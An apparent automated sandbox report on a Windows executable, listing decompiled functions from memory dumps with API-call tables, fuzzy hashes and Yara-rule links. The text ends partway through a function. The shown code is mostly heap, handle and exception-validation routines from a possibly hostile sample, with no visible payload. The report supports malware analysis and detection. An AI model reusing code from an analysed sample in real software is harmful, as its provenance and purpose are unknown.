Opcode Fuzzy Hash: d9115736d2b6ae87ba92d7a6ca6d7966deaa8301589dcb7d5a07154a4003e413
Instruction Fuzzy Hash: 1AD0C970200701FBDA012B719E0DADF7AEEEF80B01740C469B405D1168EB7CCD44DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 004011D0 Relevance: 7.8, APIs: 5, Instructions: 311
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004011D0(signed int __eax, struct HINSTANCE__* _a4, long _a8) {
				long _v8;
				long _v12;
				short _v268;
				void* _t102;
				long _t104;
				struct HINSTANCE__* _t108;
				long _t112;
				intOrPtr* _t114;
				void* _t117;
				void* _t123;
				struct HINSTANCE__* _t128;
				void* _t129;
				intOrPtr* _t137;
				long _t139;
				long _t141;
				intOrPtr* _t146;
				long _t148;
				void* _t151;
				intOrPtr _t155;
				intOrPtr* _t162;
				intOrPtr* _t167;
				long _t169;
				long _t170;
				struct HINSTANCE__* _t172;
				long _t175;
				struct HINSTANCE__ _t178;
				void* _t180;
				void* _t181;
				intOrPtr _t182;
				void* _t184;
				intOrPtr _t185;
				intOrPtr* _t187;
				intOrPtr* _t188;
				long _t189;
				long _t190;
				long _t191;
				long _t192;
				void* _t203;

				_t149 = _a4;
				_t187 = _a8;
				_t102 = (__eax | 0xffffffff) -  *_t187;
				_t203 = _t102 - 0xfffffffc;
				_t178 =  *_a4;
				if(_t203 > 0) {
					if(_t102 == 0xfffffffd) {
						if(E00402CBC( *(_t187 + 4), 2, _t149) != 0) {
							L14:
							_t104 = 0;
							L15:
							return _t104;
						}
						MultiByteToWideChar(0xfde9, 0, E00402C9F( *(_t187 + 4), _t149), 0xffffffff,  &_v268, 0x80);
						_t108 = GetModuleHandleW( &_v268);
						_a4 = _t108;
						if(_t108 == 0) {
							goto L14;
						}
						_t151 =  *((intOrPtr*)(_t108 + 0x3c)) + _t108;
						_t188 = HeapAlloc( *(_t178 + 0x18), 8, 0x1c);
						if(_t188 == 0) {
							goto L14;
						}
						 *((intOrPtr*)(_t188 + 0xc)) = 1;
						 *((intOrPtr*)(_t188 + 0x18)) =  *((intOrPtr*)(_t151 + 0x50));
						_t112 = InterlockedIncrement(_t178 + 0x40);
						 *(_t188 + 0x14) =  *(_t188 + 0x14) & 0x00000000;
						 *(_t188 + 8) = _t112;
						 *((intOrPtr*)(_t188 + 0x10)) = _a4;
						_t114 = _t178 + 0xdc;
						_t155 =  *_t114;
						 *_t188 = _t155;
						 *((intOrPtr*)(_t155 + 4)) = _t188;
						 *((intOrPtr*)(_t188 + 4)) = _t114;
						 *_t114 = _t188;
						_t104 =  *(_t188 + 8);
						goto L15;
					}
					if(_t102 == 0xfffffffe) {
						if(E00402CBC( *(_t187 + 4),  *((intOrPtr*)(_t187 + 0xc)), _t149) != 0 || E00402CBC( *((intOrPtr*)(_t187 + 8)),  *((intOrPtr*)(_t187 + 0xc)), _t149) != 0) {
							L65:
							_t104 =  *(_t187 + 4);
							goto L15;
						} else {
							_t117 = E00402C9F( *((intOrPtr*)(_t187 + 8)), _t149);
							E004143A0(E00402C9F( *(_t187 + 4), _t149), _t117,  *((intOrPtr*)(_t187 + 0xc)));
							L64:
							goto L65;
						}
					}
					if(_t102 != 0xffffffff) {
						goto L14;
					}
					if(E00402CBC( *(_t187 + 4),  *((intOrPtr*)(_t187 + 0xc)), _t149) != 0) {
						goto L65;
					}
					E00414310(E00402C9F( *(_t187 + 4), _t149),  *((intOrPtr*)(_t187 + 8)),  *((intOrPtr*)(_t187 + 0xc)));
					goto L64;
				}
				if(_t203 == 0) {
					_t189 =  *(_t187 + 4);
					_t162 = _t178 + 0xdc;
					if(_t162 ==  *_t162) {
						goto L14;
					}
					_t123 =  *(_t178 + 0xe0);
					while(_t123 != _t162) {
						if( *((intOrPtr*)(_t123 + 8)) == _t189) {
							 *( *(_t123 + 4)) =  *_t123;
							 *( *_t123 + 4) =  *(_t123 + 4);
							HeapFree( *(_t178 + 0x18), 0, _t123);
							_t104 = 1;
							goto L15;
						}
						_t123 =  *(_t123 + 4);
					}
					goto L14;
				}
				if(_t102 == 0xffffff9c) {
					E00402CBC( *(_t187 + 4), 2, _t149);
					goto L14;
				}
				if(_t102 == 0xfffffff9) {
					if(E00402CBC( *((intOrPtr*)(_t187 + 0xc)),  *(_t187 + 0x10), _t149) != 0) {
						goto L14;
					}
					_t128 =  *((intOrPtr*)(_t187 + 8));
					_a4 = _t128;
					if(_t128 < 0) {
						goto L14;
					}
					_t129 = E00402C9F( *((intOrPtr*)(_t187 + 0xc)), _t149);
					_t175 =  *(_t187 + 0x10);
					_t190 =  *(_t187 + 4);
					_t167 = _t178 + 0xdc;
					if(_t167 ==  *_t167) {
						goto L14;
					}
					_t180 =  *(_t178 + 0xe0);
					while(_t180 != _t167) {
						if( *((intOrPtr*)(_t180 + 8)) == _t190) {
							_t169 =  *((intOrPtr*)(_t180 + 0x18)) - _a4;
							_t191 = _t175;
							if(_t175 >= _t169) {
								_t191 = _t169;
							}
							_push(_t191);
							_push(_t129);
							_push( *((intOrPtr*)(_t180 + 0x10)) + _a4);
							L19:
							E004143A0();
							L20:
							_t104 = _t191;
							goto L15;
						}
						_t180 =  *(_t180 + 4);
					}
					goto L14;
				}
				if(_t102 == 0xfffffffa) {
					if( *(_t187 + 4) <= 0) {
						goto L14;
					}
					_a8 =  *((intOrPtr*)(_t187 + 8));
					_a4 = E00402C9F( *((intOrPtr*)(_t187 + 0xc)), _t149);
					_v8 =  *(_t187 + 0x10);
					if(E00402CBC( *((intOrPtr*)(_t187 + 0xc)),  *(_t187 + 0x10), _t149) != 0) {
						goto L14;
					}
					_t170 = _a8;
					if(_t170 < 0) {
						goto L14;
					}
					_t192 =  *(_t187 + 4);
					_t137 = _t178 + 0xdc;
					if(_t137 ==  *_t137) {
						L29:
						_t191 = 0;
						L30:
						_t104 = 0;
						if(_t191 <= 0) {
							goto L20;
						}
						while( *((char*)(_a4 + _t104)) != 0) {
							_t104 = _t104 + 1;
							if(_t104 < _t191) {
								continue;
							}
							goto L20;
						}
						goto L15;
					}
					_t181 =  *(_t178 + 0xe0);
					while(_t181 != _t137) {
						if( *((intOrPtr*)(_t181 + 8)) == _t192) {
							_t191 = _v8;
							_t182 =  *((intOrPtr*)(_t181 + 0x10));
							_t139 =  *((intOrPtr*)(_t181 + 0x18)) - _t170;
							if(_t191 >= _t139) {
								_t191 = _t139;
							}
							E004143A0(_a4, _t182 + _t170, _t191);
							goto L30;
						}
						_t181 =  *(_t181 + 4);
					}
					goto L29;
				}
				if(_t102 != 0xfffffffb) {
					goto L14;
				}
				_t141 =  *(_t187 + 4);
				_a8 = _t141;
				if(_t141 <= 0) {
					goto L14;
				}
				_a4 =  *((intOrPtr*)(_t187 + 8));
				_v8 = E00402C9F( *((intOrPtr*)(_t187 + 0xc)), _t149);
				_v12 =  *(_t187 + 0x10);
				if(E00402CBC( *((intOrPtr*)(_t187 + 0xc)),  *(_t187 + 0x10), _t149) != 0) {
					goto L14;
				}
				_t172 = _a4;
				if(_t172 < 0) {
					goto L14;
				}
				_t146 = _t178 + 0xdc;
				if(_t146 ==  *_t146) {
					goto L14;
				}
				_t184 =  *(_t178 + 0xe0);
				while(_t184 != _t146) {
					if( *((intOrPtr*)(_t184 + 8)) == _a8) {
						_t191 = _v12;
						_t185 =  *((intOrPtr*)(_t184 + 0x10));
						_t148 =  *((intOrPtr*)(_t184 + 0x18)) - _t172;
						if(_t191 >= _t148) {
							_t191 = _t148;
						}
						_push(_t191);
						_push(_t185 + _t172);
						_push(_v8);
						goto L19;
					}
					_t184 =  *(_t184 + 4);
				}
				goto L14;
			}

0x004011da
0x004011de
0x004011e4
0x004011e7
0x004011ea
0x004011ec
0x0040140f
0x004014b0
0x00401273
0x00401273
0x00401275
0x00401279
0x00401279
0x004014d7
0x004014e4
0x004014ec
0x004014ef
0x00000000
0x00000000
0x004014ff
0x00401507
0x0040150b
0x00000000
0x00000000
0x00401511
0x0040151b
0x00401522
0x00401528
0x0040152c
0x00401532
0x00401535
0x0040153b
0x0040153d
0x0040153f
0x00401542
0x00401545
0x00401547
0x00000000
0x00401547
0x00401418
0x00401460
0x00401498
0x00401498
0x00000000
0x00401475
0x0040147c
0x00401490
0x00401495
0x00000000
0x00401495
0x00401460
0x0040141d
0x00000000
0x00000000
0x00401434
0x00000000
0x00000000
0x00401448
0x00000000
0x00401448
0x004011f2
0x004013bf
0x004013c2
0x004013ca
0x00000000
0x00000000
0x004013d0
0x004013e0
0x004013db
0x004013ee
0x004013f8
0x004013fe
0x00401406
0x00000000
0x00401406
0x004013dd
0x004013dd
0x00000000
0x004013e4
0x004011fb
0x004013b2
0x00000000
0x004013b7
0x00401204
0x00401344
0x00000000
0x00000000
0x0040134a
0x0040134f
0x00401352
0x00000000
0x00000000
0x0040135c
0x00401361
0x00401364
0x00401369
0x00401371
0x00000000
0x00000000
0x00401377
0x00401387
0x00401382
0x00401393
0x00401396
0x0040139a
0x0040139c
0x0040139c
0x0040139e
0x0040139f
0x004013a6
0x00401292
0x00401292
0x0040129a
0x0040129a
0x00000000
0x0040129a
0x00401384
0x00401384
0x00000000
0x0040138b
0x0040120d
0x004012a2
0x00000000
0x00000000
0x004012ab
0x004012b3
0x004012be
0x004012cb
0x00000000
0x00000000
0x004012cd
0x004012d2
0x00000000
0x00000000
0x004012d4
0x004012d7
0x004012df
0x004012f5
0x004012f5
0x004012f7
0x004012f7
0x004012fb
0x00000000
0x00000000
0x004012fd
0x0040130a
0x0040130d
0x00000000
0x00000000
0x00000000
0x0040130f
0x00000000
0x004012fd
0x004012e1
0x004012f1
0x004012ec
0x00401314
0x00401317
0x0040131a
0x0040131e
0x00401320
0x00401320
0x00401329
0x00000000
0x0040132e
0x004012ee
0x004012ee
0x00000000
0x004012f1
0x00401216
0x00000000
0x00000000
0x00401218
0x0040121d
0x00401220
0x00000000
0x00000000
0x00401229
0x00401231
0x0040123c
0x00401249
0x00000000
0x00000000
0x0040124b
0x00401250
0x00000000
0x00000000
0x00401252
0x0040125a
0x00000000
0x00000000
0x0040125c
0x0040126f
0x0040126a
0x0040127d
0x00401280
0x00401283
0x00401287
0x00401289
0x00401289
0x0040128b
0x0040128e
0x0040128f
0x00000000
0x0040128f
0x0040126c
0x0040126c
0x00000000

APIs

HeapFree.KERNEL32(?,00000000,?), ref: 004013FE
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000080), ref: 004014D7
GetModuleHandleW.KERNEL32(?), ref: 004014E4
HeapAlloc.KERNEL32(?,00000008,0000001C), ref: 00401501
InterlockedIncrement.KERNEL32(?), ref: 00401522

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocByteCharFreeHandleIncrementInterlockedModuleMultiWide
String ID:
API String ID: 3283391922-0
Opcode ID: bc078c916249a68ce382bc5b3503bf0dee133e2f49d4527222de649929661b1a
Instruction ID: 560b6eec9d26d2576dda73d23124037cef1554af694ef5d5dabf855bf5daba8b
Opcode Fuzzy Hash: bc078c916249a68ce382bc5b3503bf0dee133e2f49d4527222de649929661b1a
Instruction Fuzzy Hash: 22B19B71A00601EFDB208F65C885A6BB7A5FF04354B14867EE869F76F0D774EC409B98

Uniqueness

Uniqueness Score: -1.00%

Function 023D2402 Relevance: 7.8, APIs: 5, Instructions: 292memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00001000,00003000,00000004,00000000), ref: 023D24D9
RtlAllocateHeap.NTDLL(?,00000008,0000001C), ref: 023D2561
RtlAllocateHeap.NTDLL(?,00000008,0000001C), ref: 023D25C8
GetProcessHeap.KERNEL32(00000008,?), ref: 023D270B
RtlAllocateHeap.NTDLL(00000000), ref: 023D2712

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocate$Process$Current
String ID:
API String ID: 854800669-0
Opcode ID: c296d6a77e9913f50e9cfa93d0d4cecc7eb24f20068d818f07d0559aa73cdb42
Instruction ID: f925b5c475ba288be4e883bb17cf8c74e28a1af7b53c7a745857756639287979
Opcode Fuzzy Hash: c296d6a77e9913f50e9cfa93d0d4cecc7eb24f20068d818f07d0559aa73cdb42
Instruction Fuzzy Hash: 76C17772A00705AFDB20CF68D884FAAB7F9FF44308F148569E95A9B291D771E944CF90

Uniqueness

Uniqueness Score: -1.00%

Function 004189BE Relevance: 7.7, APIs: 5, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004189BE(signed int _a4) {
				intOrPtr _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				signed int _t51;
				void* _t52;
				signed int _t53;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				signed int* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				signed int _t64;
				signed int* _t66;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				intOrPtr _t73;
				void _t74;
				signed int _t75;
				signed int _t76;
				short* _t77;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;

				_t92 = _a4;
				_t69 =  *(_t92 + 8);
				if((_t69 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x18];
				_t51 = _a4;
				_t73 =  *((intOrPtr*)(_t51 + 8));
				_v8 = _t73;
				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
					_t88 =  *((intOrPtr*)(_t92 + 0xc));
					__eflags = _t88 - 0xffffffff;
					if(_t88 != 0xffffffff) {
						_t81 = 0;
						__eflags = 0;
						_a4 = 0;
						_t52 = _t69;
						do {
							_t74 =  *_t52;
							__eflags = _t74 - 0xffffffff;
							if(_t74 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t74 - _t81;
							if(_t74 >= _t81) {
								L41:
								_t56 = 0;
								L57:
								return _t56;
							}
							L9:
							__eflags =  *(_t52 + 4);
							if( *(_t52 + 4) != 0) {
								_t13 =  &_a4;
								 *_t13 = _a4 + 1;
								__eflags =  *_t13;
							}
							_t81 = _t81 + 1;
							_t52 = _t52 + 0xc;
							__eflags = _t81 - _t88;
						} while (_t81 <= _t88);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t53 =  *0x46cf50; // 0x1
							_t91 = _t69 & 0xfffff000;
							_t93 = 0;
							__eflags = _t53;
							if(_t53 <= 0) {
								L18:
								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
								__eflags = _t55;
								if(_t55 == 0) {
									L56:
									_t56 = _t55 | 0xffffffff;
									__eflags = _t56;
									goto L57;
								}
								__eflags = _v36.Type - 0x1000000;
								if(_v36.Type != 0x1000000) {
									goto L56;
								}
								__eflags = _v36.Protect & 0x000000cc;
								if((_v36.Protect & 0x000000cc) == 0) {
									L28:
									_t57 = InterlockedExchange(0x46cf98, 1);
									__eflags = _t57;
									if(_t57 != 0) {
										goto L5;
									}
									_t75 =  *0x46cf50; // 0x1
									__eflags = _t75;
									_t82 = _t75;
									if(_t75 <= 0) {
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											L40:
											InterlockedExchange(0x46cf98, 0);
											goto L5;
										}
										_t70 = 0xf;
										__eflags = _t75 - _t70;
										if(_t75 <= _t70) {
											_t70 = _t75;
										}
										_t83 = 0;
										__eflags = _t70;
										if(_t70 < 0) {
											L38:
											__eflags = _t75 - 0x10;
											if(_t75 < 0x10) {
												_t76 = _t75 + 1;
												__eflags = _t76;
												 *0x46cf50 = _t76;
											}
											goto L40;
										} else {
											do {
												_t60 = 0x46cf58 + _t83 * 4;
												_t83 = _t83 + 1;
												__eflags = _t83 - _t70;
												 *_t60 = _t91;
												_t91 =  *_t60;
											} while (_t83 <= _t70);
											goto L38;
										}
									}
									_t61 = 0x46cf54 + _t75 * 4;
									while(1) {
										__eflags =  *_t61 - _t91;
										if( *_t61 == _t91) {
											goto L33;
										}
										_t82 = _t82 - 1;
										_t61 = _t61 - 4;
										__eflags = _t82;
										if(_t82 > 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
								_t77 = _v36.AllocationBase;
								__eflags =  *_t77 - 0x5a4d;
								if( *_t77 != 0x5a4d) {
									goto L56;
								}
								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
								__eflags =  *_t55 - 0x4550;
								if( *_t55 != 0x4550) {
									goto L56;
								}
								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
								if( *((short*)(_t55 + 0x18)) != 0x10b) {
									goto L56;
								}
								_t71 = _t69 - _t77;
								__eflags =  *((short*)(_t55 + 6));
								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
								if( *((short*)(_t55 + 6)) <= 0) {
									goto L56;
								}
								_t63 =  *((intOrPtr*)(_t79 + 0xc));
								__eflags = _t71 - _t63;
								if(_t71 < _t63) {
									goto L28;
								}
								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
									goto L28;
								}
								__eflags =  *(_t79 + 0x27) & 0x00000080;
								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
									goto L41;
								}
								goto L28;
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x46cf58 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x46cf58 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 + 1;
								__eflags = _t93 - _t53;
								if(_t93 < _t53) {
									continue;
								}
								goto L18;
							}
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L5;
							}
							_t64 = InterlockedExchange(0x46cf98, 1);
							__eflags = _t64;
							if(_t64 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x46cf58 + _t93 * 4)) - _t91;
							if( *((intOrPtr*)(0x46cf58 + _t93 * 4)) == _t91) {
								L53:
								_t80 = 0;
								__eflags = _t93;
								if(_t93 < 0) {
									L55:
									InterlockedExchange(0x46cf98, 0);
									goto L5;
								} else {
									goto L54;
								}
								do {
									L54:
									_t66 = 0x46cf58 + _t80 * 4;
									_t80 = _t80 + 1;
									__eflags = _t80 - _t93;
									 *_t66 = _t91;
									_t91 =  *_t66;
								} while (_t80 <= _t93);
								goto L55;
							}
							_t67 =  *0x46cf50; // 0x1
							_t43 = _t67 - 1; // 0x0
							_t93 = _t43;
							__eflags = _t93;
							if(_t93 < 0) {
								L49:
								__eflags = _t67 - 0x10;
								if(_t67 < 0x10) {
									_t67 = _t67 + 1;
									__eflags = _t67;
									 *0x46cf50 = _t67;
								}
								_t46 = _t67 - 1; // 0x1
								_t93 = _t46;
								goto L53;
							} else {
								goto L46;
							}
							while(1) {
								L46:
								__eflags =  *((intOrPtr*)(0x46cf58 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x46cf58 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 - 1;
								__eflags = _t93;
								if(_t93 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t93;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L55;
								}
								goto L53;
							}
							goto L49;
						}
						_t68 =  *((intOrPtr*)(_t92 - 8));
						__eflags = _t68 - _v8;
						if(_t68 < _v8) {
							goto L41;
						}
						__eflags = _t68 - _t92;
						if(_t68 >= _t92) {
							goto L41;
						}
						goto L15;
					}
					L5:
					_t56 = 1;
					goto L57;
				} else {
					goto L3;
				}
			}

0x004189c6
0x004189c9
0x004189cf
0x004189ec
0x00000000
0x004189ec
0x004189d7
0x004189da
0x004189dd
0x004189e2
0x004189e5
0x004189f4
0x004189f7
0x004189fa
0x00418a04
0x00418a04
0x00418a06
0x00418a09
0x00418a0b
0x00418a0b
0x00418a0d
0x00418a10
0x00000000
0x00000000
0x00418a12
0x00418a14
0x00418b5f
0x00418b5f
0x00418be2
0x00000000
0x00418be2
0x00418a1a
0x00418a1a
0x00418a1e
0x00418a20
0x00418a20
0x00418a20
0x00418a20
0x00418a23
0x00418a24
0x00418a27
0x00418a27
0x00418a2b
0x00418a2f
0x00418a45
0x00418a45
0x00418a4c
0x00418a52
0x00418a54
0x00418a56
0x00418a6a
0x00418a71
0x00418a77
0x00418a79
0x00418bdf
0x00418bdf
0x00418bdf
0x00000000
0x00418bdf
0x00418a7f
0x00418a86
0x00000000
0x00000000
0x00418a8c
0x00418a90
0x00418ae8
0x00418aef
0x00418af5
0x00418af7
0x00000000
0x00000000
0x00418afd
0x00418b03
0x00418b05
0x00418b07
0x00418b1c
0x00418b1c
0x00418b1e
0x00418b4d
0x00418b54
0x00000000
0x00418b54
0x00418b22
0x00418b23
0x00418b25
0x00418b27
0x00418b27
0x00418b29
0x00418b2b
0x00418b2d
0x00418b41
0x00418b41
0x00418b44
0x00418b46
0x00418b46
0x00418b47
0x00418b47
0x00000000
0x00418b2f
0x00418b2f
0x00418b2f
0x00418b38
0x00418b39
0x00418b3b
0x00418b3d
0x00418b3d
0x00000000
0x00418b2f
0x00418b2d
0x00418b09
0x00418b10
0x00418b10
0x00418b12
0x00000000
0x00000000
0x00418b14
0x00418b15
0x00418b18
0x00418b1a
0x00000000
0x00000000
0x00000000
0x00418b1a
0x00000000
0x00418b10
0x00418a92
0x00418a95
0x00418a9a
0x00000000
0x00000000
0x00418aa3
0x00418aa5
0x00418aab
0x00000000
0x00000000
0x00418ab1
0x00418ab7
0x00000000
0x00000000
0x00418abd
0x00418abf
0x00418ac8
0x00418acc
0x00000000
0x00000000
0x00418ad2
0x00418ad5
0x00418ad7
0x00000000
0x00000000
0x00418ade
0x00418ae0
0x00000000
0x00000000
0x00418ae2
0x00418ae6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00418a58
0x00418a58
0x00418a58
0x00418a5f
0x00000000
0x00000000
0x00418a65
0x00418a66
0x00418a68
0x00000000
0x00000000
0x00000000
0x00418a68
0x00418b63
0x00418b65
0x00000000
0x00000000
0x00418b78
0x00418b7a
0x00418b7c
0x00000000
0x00000000
0x00418b82
0x00418b89
0x00418bb9
0x00418bb9
0x00418bbb
0x00418bbd
0x00418bd1
0x00418bd8
0x00000000
0x00000000
0x00000000
0x00000000
0x00418bbf
0x00418bbf
0x00418bbf
0x00418bc8
0x00418bc9
0x00418bcb
0x00418bcd
0x00418bcd
0x00000000
0x00418bbf
0x00418b8b
0x00418b90
0x00418b90
0x00418b93
0x00418b95
0x00418ba7
0x00418ba7
0x00418baa
0x00418bac
0x00418bac
0x00418bad
0x00418bad
0x00418bb2
0x00418bb2
0x00000000
0x00000000
0x00000000
0x00000000
0x00418b97
0x00418b97
0x00418b97
0x00418b9e
0x00000000
0x00000000
0x00418ba0
0x00418ba0
0x00418ba1
0x00000000
0x00000000
0x00000000
0x00418ba1
0x00418ba3
0x00418ba5
0x00418bb7
0x00000000
0x00000000
0x00000000
0x00418bb7
0x00000000
0x00418ba5
0x00418a31
0x00418a34
0x00418a37
0x00000000
0x00000000
0x00418a3d
0x00418a3f
0x00000000
0x00000000
0x00000000
0x00418a3f
0x004189fc
0x004189fe
0x00000000
0x00000000
0x00000000
0x00000000

APIs

VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,00416255,?), ref: 00418A71
InterlockedExchange.KERNEL32(0046CF98,00000001), ref: 00418AEF
InterlockedExchange.KERNEL32(0046CF98,00000000), ref: 00418B54
InterlockedExchange.KERNEL32(0046CF98,00000001), ref: 00418B78
InterlockedExchange.KERNEL32(0046CF98,00000000), ref: 00418BD8

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExchangeInterlocked$QueryVirtual
String ID:
API String ID: 2947987494-0
Opcode ID: 5d7f150ee224a4ce8d150ff71353070f8355921d9508586c0cc63f4ba2b5b877
Instruction ID: c97fcc3b39c054588007956e25ca066f5878c9f2d34ab82c07f7c19460d3b703
Opcode Fuzzy Hash: 5d7f150ee224a4ce8d150ff71353070f8355921d9508586c0cc63f4ba2b5b877
Instruction Fuzzy Hash: 9651E370B046519FCB288F18D8847BA77A2AB51318F64816FE546873D1EF78ECC1878D

Uniqueness

Uniqueness Score: -1.00%

Function 023E6D3E Relevance: 7.7, APIs: 5, Instructions: 172COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 023E6D9B
GetFileType.KERNEL32(?), ref: 023E6E45
GetStdHandle.KERNEL32(-000000F6), ref: 023E6EC6

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: FileHandleInfoStartupType
String ID:
API String ID: 2461013171-0
Opcode ID: e99692d4f6d1c96975ebf450efcd3270a015f5a4f28fd766dfaf829ca5a3dacb
Instruction ID: 633c679a5abd9d3547e2c8d012b08d20cffe7de9a390665b9b021bf822295745
Opcode Fuzzy Hash: e99692d4f6d1c96975ebf450efcd3270a015f5a4f28fd766dfaf829ca5a3dacb
Instruction Fuzzy Hash: 0451E371A047528FDB209F28C9857667BEDAB61728F184A7DD4A7C72E2E730D04DCB06

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED7 Relevance: 7.7, APIs: 5, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00415ED7() {
				void* __ebp;
				signed int _t51;
				signed int _t55;
				long _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				void* _t69;
				signed int* _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed char _t89;
				signed int _t96;
				void* _t99;
				int _t101;
				void** _t103;
				void** _t105;
				signed int** _t106;
				intOrPtr* _t109;
				void* _t110;

				_t51 = E00417CFF(0x480);
				if(_t51 != 0) {
					 *0x46d380 = _t51;
					 *0x46d368 = 0x20;
					_t1 = _t51 + 0x480; // 0x480
					_t84 = _t1;
					while(1) {
						__eflags = _t51 - _t84;
						if(_t51 >= _t84) {
							break;
						}
						 *_t51 =  *_t51 | 0xffffffff;
						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
						 *((char*)(_t51 + 4)) = 0;
						 *((char*)(_t51 + 5)) = 0xa;
						_t85 =  *0x46d380; // 0x2770640
						_t51 = _t51 + 0x24;
						_t84 = _t85 + 0x480;
						__eflags = _t84;
					}
					GetStartupInfoA(_t110 + 0x14);
					__eflags =  *((short*)(_t110 + 0x46));
					if( *((short*)(_t110 + 0x46)) == 0) {
						L26:
						_t81 = 0;
						__eflags = 0;
						do {
							_t86 =  *0x46d380; // 0x2770640
							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
							__eflags =  *_t103 - 0xffffffff;
							if( *_t103 != 0xffffffff) {
								_t49 =  &(_t103[1]);
								 *_t49 = _t103[1] | 0x00000080;
								__eflags =  *_t49;
								goto L42;
							}
							__eflags = _t81;
							_t103[1] = 0x81;
							if(_t81 != 0) {
								asm("sbb eax, eax");
								_t59 =  ~(_t81 - 1) + 0xfffffff5;
								__eflags = _t59;
							} else {
								_t59 = 0xfffffff6;
							}
							_t99 = GetStdHandle(_t59);
							__eflags = _t99 - 0xffffffff;
							if(_t99 == 0xffffffff) {
								L40:
								_t103[1] = _t103[1] | 0x00000040;
							} else {
								_t61 = GetFileType(_t99);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L40;
								}
								_t62 = _t61 & 0x000000ff;
								__eflags = _t62 - 2;
								 *_t103 = _t99;
								if(__eflags != 0) {
									__eflags = _t62 - 3;
									if(__eflags == 0) {
										_t42 =  &(_t103[1]);
										 *_t42 = _t103[1] | 0x00000008;
										__eflags =  *_t42;
									}
								} else {
									_t103[1] = _t103[1] | 0x00000040;
								}
								_t44 =  &(_t103[3]); // 0xc
								_push(0xfa0);
								_t64 = E00417D21(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									L30:
									_t55 = _t64 | 0xffffffff;
									L44:
									return _t55;
								} else {
									_t103[2] = _t103[2] + 1;
									goto L42;
								}
							}
							L42:
							_t81 = _t81 + 1;
							__eflags = _t81 - 3;
						} while (_t81 < 3);
						SetHandleCount( *0x46d368);
						_t55 = 0;
						__eflags = 0;
						goto L44;
					}
					_t65 =  *(_t110 + 0x48);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L26;
					}
					_t101 =  *_t65;
					_t109 = _t65 + 4;
					 *(_t110 + 0x10) = _t101 + _t109;
					__eflags = _t101 - 0x800;
					if(_t101 >= 0x800) {
						_t101 = 0x800;
					}
					__eflags =  *0x46d368 - _t101; // 0x20
					if(__eflags >= 0) {
						L18:
						_t82 = 0;
						__eflags = _t101;
						if(_t101 <= 0) {
							goto L26;
						} else {
							goto L19;
						}
						do {
							L19:
							_t69 =  *( *(_t110 + 0x10));
							__eflags = _t69 - 0xffffffff;
							if(_t69 == 0xffffffff) {
								goto L25;
							}
							_t89 =  *_t109;
							__eflags = _t89 & 0x00000001;
							if((_t89 & 0x00000001) == 0) {
								goto L25;
							}
							__eflags = _t89 & 0x00000008;
							if(__eflags != 0) {
								L23:
								_t105 = 0x46d380[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
								 *_t105 =  *( *(_t110 + 0x10));
								_t105[1] =  *_t109;
								_t30 =  &(_t105[3]); // 0xc
								_push(0xfa0);
								_t64 = E00417D21(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									goto L30;
								}
